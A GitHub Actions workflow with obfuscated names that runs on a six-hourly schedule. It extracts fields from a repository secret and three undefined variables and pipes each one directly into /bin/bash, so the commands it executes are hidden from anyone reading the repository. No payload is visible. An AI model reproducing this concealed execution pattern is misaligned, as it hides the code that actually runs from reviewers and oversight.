name: multiduochxx

on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: multiduochxx
        env:
          zfup28257: ${{ secrets.zfup28257 }}
        run: |
          echo $zfup28257 | jq -r .u893 | /bin/bash
          echo $j03 | jq -r .nrdq24563 | /bin/bash
          echo $l2 | jq -r .lpab68734 | /bin/bash
          echo $gcwus96740 | jq -r .amlcf79374 | /bin/bash

